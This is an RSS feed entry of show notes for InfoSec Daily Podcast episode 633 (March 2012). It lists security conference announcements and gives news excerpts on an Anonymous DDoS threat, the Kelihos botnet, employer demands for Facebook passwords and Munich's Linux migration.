			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 633 for March 30, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.itproportal.com/2012/03/29/anonymous-operation-global-blackout-coming-sooon/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.itproportal.com/2012/03/29/anonymous-operation-global-blackout-coming-sooon/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest publicised and warned off attack by the hacktivist movement known as Anonymous is just around the corner. Operation Global Blackout, set to occur on 31st March, will target the world&#39;s 13 main DNS servers in an effort to temporarily shut down the internet. While most expect that to be an aim just out of reach of the hacking collective, there is some worry that a global slow down could occur.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Anons have made good on threats in the past, using tools like the Low Orbit Ion Cannon to perform Distributed Denial of Service (DDOS) attacks. This is the same method that the movement plans to use in the DNS takedown attempt, but will it be successful?</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.theregister.co.uk/2012/03/29/kelhios_bot_not_dead_yet/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/03/29/kelhios_bot_not_dead_yet/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security researchers have warned that the resurrected Kelihos botnet blasted off the face of the web yesterday is still alive.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Experts not involved in the blasting say the miscreants behind the network of compromised Windows computers are working on their comeback. The zombie PC army was walloped offline in September, they say, yet later resurfaced.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Seculert reports that Kelihos-B, which was distributed as a Facebook worm over recent weeks, is still active and spreading &#8211; even after the shutdown attempt by CrowdStrike and Kaspersky Labs this week.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Seculert views this botnet as the undead remnants of Kelihos-B rather than the spawn of a new variant of the malware.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://swizec.com/blog/why-programmers-work-at-night/swizec/3198"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://swizec.com/blog/why-programmers-work-at-night/swizec/3198</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A popular saying goes that Programmers are machines that turn caffeine into code. &nbsp;And sure enough, ask a random programmer when they do their best work and there&rsquo;s a high chance they will admit to a lot of late nights. Some earlier, some later. A popular trend is to get up at 4am and get some work done before the day&rsquo;s craziness begins. Others like going to bed at 4am.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At the gist of all this is avoiding distractions. But you could just lock the door, what&rsquo;s so special about the night?</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I think it boils down to three things: the maker&rsquo;s schedule, the sleepy brain and bright computer screens.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><a href="http://www.zdnet.com/blog/facebook/house-votes-down-stopping-employers-asking-for-facebook-passwords/11067"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/facebook/house-votes-down-stopping-employers-asking-for-facebook-passwords/11067</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(</span><a href="http://sphotos.xx.fbcdn.net/hphotos-prn1/543171_417610088256395_222759144408158_1875377_1667969217_n.jpg%29"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://sphotos.xx.fbcdn.net/hphotos-prn1/543171_417610088256395_222759144408158_1875377_1667969217_n.jpg)</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">House Republicans today defeated an amendment introduced yesterday that would have banned employers demanding access to Facebook accounts. While the practice isn&rsquo;t widespread, it has caused a big brouhaha after reports surfaced that some organizations were requiring workers to hand over Facebook passwords as a condition of keeping their current job or getting hired for a new one. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The amendment, which was added to a larger FCC reform package, was defeated on Wednesday by a vote of 236 to 184. The underlying bill was approved by a vote of 247 to 174, but has not cleared the U.S. Senate. Republicans are not convinced the amendment is necessary, but did say they would be open to addressing the issue in separate legislation.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook on Friday stirred up quite the storm when it outlined how it wants to protect its users from employers demanding access to their accounts. Remember: sharing or soliciting a Facebook password is a violation of the social network&rsquo;s Statement of Rights and Responsibilities. The social networking giant did clarify, however, that it currently has no plans to sue employers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://translate.google.com/translate?sl=de&amp;tl=en&amp;js=n&amp;prev=_t&amp;hl=en&amp;ie=UTF-8&amp;layout=2&amp;eotf=1&amp;u=http%3A%2F%2Fwww.golem.de%2Fnews%2Fob-christian-ude-muenchen-spart-mit-limux-geld-und-hat-weniger-stoerungen-1203-90821.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://translate.google.com/translate?sl=de&amp;tl=en&amp;js=n&amp;prev=_t&amp;hl=en&amp;ie=UTF-8&amp;layout=2&amp;eotf=1&amp;u=http%3A%2F%2Fwww.golem.de%2Fnews%2Fob-christian-ude-muenchen-spart-mit-limux-geld-und-hat-weniger-stoerungen-1203-90821.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The city of Munich with her ​​savings Limux project about a third of their spending in the IT sector, particularly in license costs. Moreover, since the switch to Linux a few reported cases of disorder.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">By making the switch to Linux, according to the city of Munich in response to a request from the CSU has already saved about 4 million euros in licensing costs. Be present, &quot;the budget, cost 11.7 million euros (as of end December 2011).&quot; With an increase of 1,500 to 9,500 jobs in addition the number of alarms from 70 to 46 per month had decreased.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In calculating the costs saved from Munich&#39;s mayor Christian Ude of 15,000 Microsoft Office licenses and 7,500 Microsoft Windows licenses that need to be partly purchased. In addition, 7,500 new computer hardware must be purchased to meet the system requirements of current versions of Windows.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Also in the bill were included training costs and costs of migration. To get to a level that is comparable to the current state of Limux project, would be the number of new computers to be equipped increases to 10,000. On the whole would cost to upgrade to Windows-15.52 million &euro;. The renewal of license costs incurred in Windows computers every three to four years would again be more than 2.8 million euros for 10,000 computer calculates Ude.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-633-global-blackout-kelihos-zombies-crystal-palace-of-code-facebook-passwords-and-the-limux-project/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3709/0/infosec-daily-podcast-episode-633.mp3" length="23883946" type="audio/mpeg" />
		<itunes:duration>0:49:43</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 633 for March 30, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 633 for March 30, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://www.itproportal.com/2012/03/29/anonymous-operation-global-blackout-coming-sooon/
The latest publicised and warned off attack by the hacktivist movement known as Anonymous is just around the corner. Operation Global Blackout, set to occur on 31st March, will target the world&#39;s 13 main DNS servers in an effort to temporarily shut down the internet. While most expect that to be an aim just out of reach of the hacking collective, there is some worry that a global slow down could occur.
&#160;
The Anons have made good on threats in the past, using tools like the Low Orbit Ion Cannon to perform Distributed Denial of Service (DDOS) attacks. This is the same method that the movement plans to use in the DNS takedown attempt, but will it be successful?
&#8230;
	Source: http://www.theregister.co.uk/2012/03/29/kelhios_bot_not_dead_yet/
Security researchers have warned that the resurrected Kelihos botnet blasted off the face of the web yesterday is still alive.
&#160;
Experts not involved in the blasting say the miscreants behind the network of compromised Windows computers are working on their comeback. The zombie PC army was walloped offline in September, they say, yet later resurfaced.
&#160;
Seculert reports that Kelihos-B, which was distributed as a Facebook worm over recent weeks, is still active and spreading &#8211; even after the shutdown attempt by CrowdStrike and Kaspersky Labs this week.
&#160;
Seculert views this botnet as the undead remnants of Kelihos-B rather than the spawn of a new variant of the malware.
&#8230;
Source: http://swizec.com/blog/why-programmers-work-at-night/swizec/3198
A popular saying goes that Programmers are machines that turn caffeine into code. &#160;And sure enough, ask a random programmer when they do their best work and there&#8217;s a high chance they will admit to a lot of late nights. Some earlier, some later. A popular trend is to get up at 4am and get some work done before the day[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 632 &#8211; Parliament Fail, Adobe Updater, Satellite Jamming, VX Heavens, and Account Reporting</title>
